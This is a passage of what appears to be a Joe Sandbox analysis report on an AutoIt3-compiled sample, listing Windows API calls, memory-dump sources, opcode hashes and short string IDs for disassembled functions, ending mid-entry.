                                                                  • Instruction Fuzzy Hash: 84F0BE3100531CBBDB126F50AC0DFCF3F59AF06321F248000FA22211E18BB55555EBE9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32 ref: 00F2AA6F
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F2AA82
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00F2AA89
                                                                  • AttachThreadInput.USER32(00000000), ref: 00F2AA90
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 2710830443-0
                                                                  • Opcode ID: 47252a4f5841dd57abc4b964a5c9c6d24015b0ec09fc28c2679d9b98e95301ff
                                                                  • Instruction ID: a8a2065f69b1a1950243c4e54bf6eac54f59b1a2c09d20debbb8f508d3e9b70c
                                                                  • Opcode Fuzzy Hash: 47252a4f5841dd57abc4b964a5c9c6d24015b0ec09fc28c2679d9b98e95301ff
                                                                  • Instruction Fuzzy Hash: C2E0393154122CBBDB215FA2ED0CEEB3F1CEF127A1F108011F51984090CAB68550EFA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetSysColor.USER32(00000008), ref: 00ED260D
                                                                  • SetTextColor.GDI32(?,000000FF), ref: 00ED2617
                                                                  • SetBkMode.GDI32(?,00000001), ref: 00ED262C
                                                                  • GetStockObject.GDI32(00000005), ref: 00ED2634
                                                                  • GetWindowDC.USER32(?,00000000), ref: 00F0C1C4
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F0C1D1
                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00F0C1EA
                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00F0C203
                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00F0C223
                                                                  • ReleaseDC.USER32 ref: 00F0C22E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                  • String ID:
                                                                  • API String ID: 1946975507-0
                                                                  • Opcode ID: 7ecfad7fad9fba0635fd6a03f4e9377258095cd574634d3283d71aff210ff2d2
                                                                  • Instruction ID: 731b51af6588a8e1c660dbc042d5a2ce1cb0f882102da25c61772cbcff32c6f6
                                                                  • Opcode Fuzzy Hash: 7ecfad7fad9fba0635fd6a03f4e9377258095cd574634d3283d71aff210ff2d2
                                                                  • Instruction Fuzzy Hash: 34E0E531504248BBDB215F64AC497D93B11EB16336F148366FA79580E18BB14994FB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetCurrentThread.KERNEL32 ref: 00F29339
                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F28F04), ref: 00F29340
                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F28F04), ref: 00F2934D
                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F28F04), ref: 00F29354
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                  • String ID:
                                                                  • API String ID: 3974789173-0
                                                                  • Opcode ID: ca676f9336bc5474f386f880de275c3e8558fceba0dcf29db269d9c9a2bfc097
                                                                  • Instruction ID: 0bca08c5614838cd8e33aacc3b3b4c244c5fb6125ab06d6675150935de96bcd1
                                                                  • Opcode Fuzzy Hash: ca676f9336bc5474f386f880de275c3e8558fceba0dcf29db269d9c9a2bfc097
                                                                  • Instruction Fuzzy Hash: 83E08632A01225AFE7205FB16D0DB573B6CEF507A2F204818F255CA090EAB49444E754
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  • Opcode ID: 44e7a14d1640c83b44ab8a8a7777d3b6fbc005a94b156dc7714fa5cd3a4f3a55
                                                                  • Instruction ID: e5f7652b1fdd890eeb1ecb8f6b4a2dd322fd91e0f68ac3c691352447ad62a89b
                                                                  • Opcode Fuzzy Hash: 44e7a14d1640c83b44ab8a8a7777d3b6fbc005a94b156dc7714fa5cd3a4f3a55
                                                                  • Instruction Fuzzy Hash: B9E01271800209EFCB015F60D908B9E7FF1EB9C310F218005F869A7350DFB54551AF50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  • Opcode ID: af5315884c1fb26411de9fc4b710b7589c21c6b5d7401323ace9c45242814e1b
                                                                  • Instruction ID: c1a00614b82b65a899c8a215ce39723ec40e8c822a9e78083b884d8a9251d1f5
                                                                  • Opcode Fuzzy Hash: af5315884c1fb26411de9fc4b710b7589c21c6b5d7401323ace9c45242814e1b
                                                                  • Instruction Fuzzy Hash: EFE01AB1800209AFCB019F60D908A9E7FF2EB9C310F208005F969A7350DBB99552AF50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __getptd_noexit.LIBCMT ref: 00EF5FCD
                                                                    • Part of subcall function 00EF9BF4: GetLastError.KERNEL32(?,00EF1003,00EF8D5D,00EF59C3,?,?,00EF1003,?), ref: 00EF9BF6
                                                                    • Part of subcall function 00EF9BF4: __calloc_crt.LIBCMT ref: 00EF9C17
                                                                    • Part of subcall function 00EF9BF4: __initptd.LIBCMT ref: 00EF9C39
                                                                    • Part of subcall function 00EF9BF4: GetCurrentThreadId.KERNEL32 ref: 00EF9C40
                                                                    • Part of subcall function 00EF9BF4: SetLastError.KERNEL32(00000000,00EF1003,00EF8D5D,00EF59C3,?,?,00EF1003,?), ref: 00EF9C58
                                                                  • CloseHandle.KERNEL32(?,?,00EF5FAC), ref: 00EF5FE1
                                                                  • __freeptd.LIBCMT ref: 00EF5FE8
                                                                  • ExitThread.KERNEL32 ref: 00EF5FF0
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
                                                                  • String ID:
                                                                  • API String ID: 4169687693-0
                                                                  • Opcode ID: e8e56cc06696f8efcb3304c68b67f83c2e333e05c41bc094f2331e2cd5a95110
                                                                  • Instruction ID: a4fcca7eb11f94fb35a8169424be1675b01ead9e0aab06af4b214b7fc19144f4
                                                                  • Opcode Fuzzy Hash: e8e56cc06696f8efcb3304c68b67f83c2e333e05c41bc094f2331e2cd5a95110
                                                                  • Instruction Fuzzy Hash: BBD0A733402E5887C2322764AC0EF3A32505F00B26F245244F7B5756F18FA188028645
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 00F2C057
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ContainedObject
                                                                  • String ID: AutoIt3GUI$Container
                                                                  • API String ID: 3565006973-3941886329
                                                                  • Opcode ID: c5c0696c54b35eec2949b0fc7af64880e70ef34d247a940dd59ecd0f7f5638d7
                                                                  • Instruction ID: 63ec485facdb1942604f0a0229a681d77479080c1e0dec92466615654d4b6a1a
                                                                  • Opcode Fuzzy Hash: c5c0696c54b35eec2949b0fc7af64880e70ef34d247a940dd59ecd0f7f5638d7
                                                                  • Instruction Fuzzy Hash: 09915571600211AFDB14DF64D885B6ABBE8FF48710F20856EF90ADB291DB71E841DBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE436A: _wcscpy.LIBCMT ref: 00EE438D
                                                                    • Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
                                                                    • Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC
                                                                  • __wcsnicmp.LIBCMT ref: 00F3B670
                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F3B739
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                  • String ID: LPT
                                                                  • API String ID: 3222508074-1350329615
                                                                  • Opcode ID: 3184ef3ed01dd113c1e7b20c4afb9cbd3216f3aa370e12c79705678e913527d1
                                                                  • Instruction ID: b8bb102f8d9f33c313469d00cf118db497f414e4892f01475b515766cf4b5d49
                                                                  • Opcode Fuzzy Hash: 3184ef3ed01dd113c1e7b20c4afb9cbd3216f3aa370e12c79705678e913527d1
                                                                  • Instruction Fuzzy Hash: 71617476E00219AFCB14DF54C895EAEB7F5EF48320F14405AFA46AB391D770AE41DB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: #V
                                                                  • API String ID: 4104443479-3658881132
                                                                  • Opcode ID: c702c3a866a04ff7360501632ee284d4fa54be191041c843fe769b96cbe653a9
                                                                  • Instruction ID: c9e325a55d1d420c95fcd4acd532b4ed60a3eddd8eb1256584e569f7d6ef4239
                                                                  • Opcode Fuzzy Hash: c702c3a866a04ff7360501632ee284d4fa54be191041c843fe769b96cbe653a9
                                                                  • Instruction Fuzzy Hash: 1F516E70D00609DFCB25DFA8C890AEEBBB1FF44314F24452AE85AE7250E731A995DF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000), ref: 00EDE01E
                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00EDE037
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemorySleepStatus
                                                                  • String ID: @
                                                                  • API String ID: 2783356886-2766056989
                                                                  • Opcode ID: 73c7a93bbc29fed470c34c8312c4078c8e0b55f78d936dbd18eca422961b02a3
                                                                  • Instruction ID: ff9ea84634177689f02a2f2937962eddaa228bfe26bfcfd8155556a67ddc4368
                                                                  • Opcode Fuzzy Hash: 73c7a93bbc29fed470c34c8312c4078c8e0b55f78d936dbd18eca422961b02a3
                                                                  • Instruction Fuzzy Hash: 3E517AB14087489BE320AF14EC85BAFB7F8FF94714F41485EF1D851291DB719469CB16
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE4AB2: __fread_nolock.LIBCMT ref: 00EE4AD0
                                                                  • _wcscmp.LIBCMT ref: 00F39DE1
                                                                  • _wcscmp.LIBCMT ref: 00F39DF4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp$__fread_nolock
                                                                  • String ID: FILE
                                                                  • API String ID: 4029003684-3121273764
                                                                  • Opcode ID: dba18ae3a83513cf93b3ca99e618dd6362292a4fa53d2955cb4ca662622d4da0
                                                                  • Instruction ID: 54d8bcdd9528c630c6c4310bf586dd9f3609b5aba534e5b4ff171604ae6ed4c6
                                                                  • Opcode Fuzzy Hash: dba18ae3a83513cf93b3ca99e618dd6362292a4fa53d2955cb4ca662622d4da0
                                                                  • Instruction Fuzzy Hash: B941E772A4420ABADF20EAA5CC46FEF77FDDF45720F00447AFA04B7180E6B199449B65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00F58186
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F5819B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: '
                                                                  • API String ID: 3850602802-1997036262
                                                                  • Opcode ID: b4ee6bbd6328094910762ed25c39955e67b6ab8e33e9d3d32f41d285eded00f8
                                                                  • Instruction ID: afb5db858aa29d76f9b6951290f480c23409e1dc452397dd27fc1f20a8bd0546
                                                                  • Opcode Fuzzy Hash: b4ee6bbd6328094910762ed25c39955e67b6ab8e33e9d3d32f41d285eded00f8
                                                                  • Instruction Fuzzy Hash: 21412874A007099FDB10CF64C881BDA7BB5FB08341F10006AEE05EB392DB71A946DF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00F42C6A
                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F42CA0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CrackInternet_memset
                                                                  • String ID: |
                                                                  • API String ID: 1413715105-2343686810
                                                                  • Opcode ID: 8247d1d6a1d63973c8926cf73388df023ef3a74a396e7cc90c522a3d5fb24087
                                                                  • Instruction ID: 568fe9004e86fd0b073e138fc9aa618e627d947c09fe5e4a7e41e63998aa66a4
                                                                  • Opcode Fuzzy Hash: 8247d1d6a1d63973c8926cf73388df023ef3a74a396e7cc90c522a3d5fb24087
                                                                  • Instruction Fuzzy Hash: BB311771C00219ABCF01EFA1DC85AEEBFB9FF08350F100069FD15A6262EB315956DBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00F5713C
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F57178
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$DestroyMove
                                                                  • String ID: static
                                                                  • API String ID: 2139405536-2160076837
                                                                  • Opcode ID: 8bf56306261cb76c50b3b5f7232bb0770e749966928d6dc7d1c0ed6651cf2935
                                                                  • Instruction ID: db3dc976797b49db4a53a3d2fdbebef0bcc5e4e248f565eff92fa6ebe4cc04b0
                                                                  • Opcode Fuzzy Hash: 8bf56306261cb76c50b3b5f7232bb0770e749966928d6dc7d1c0ed6651cf2935
                                                                  • Instruction Fuzzy Hash: 0331AF71100604AEDB11AF78DC80EFB73A9FF48720F109619FEA597191DB31AC85EB64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00F330B8
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F330F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: InfoItemMenu_memset
                                                                  • String ID: 0
                                                                  • API String ID: 2223754486-4108050209
                                                                  • Opcode ID: a41221b714fc3e541d71bae6f9204da7128ee0b06ea733b2a7fb8452e353f7be
                                                                  • Instruction ID: 6f4da483991d92c258ea371654cc7ec2d2f72122f7e82dcd0d7abb8e6828898c
                                                                  • Opcode Fuzzy Hash: a41221b714fc3e541d71bae6f9204da7128ee0b06ea733b2a7fb8452e353f7be
                                                                  • Instruction Fuzzy Hash: 6B31D632E00309EBEB24EF58C885BAFBBF9EF05370F144019E985A61A1D7709B44EB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __snwprintf.LIBCMT ref: 00F44132
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: __snwprintf_memmove
                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                  • API String ID: 3506404897-2584243854
                                                                  • Opcode ID: 91654fe769fbfa7dc9c9ede61867f6df60f4cc27bdb52287fb1b105ce16e8be8
                                                                  • Instruction ID: 37dc0af19a063a2af7148c50a380506444082ef3a7b95b766f93b6f688ae8491
                                                                  • Opcode Fuzzy Hash: 91654fe769fbfa7dc9c9ede61867f6df60f4cc27bdb52287fb1b105ce16e8be8
                                                                  • Instruction Fuzzy Hash: E321AE31A0021CABCF01EF64C881FAE7BA5EF94340F000499F904F7242DB34E985EBA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F56D86
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F56D91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
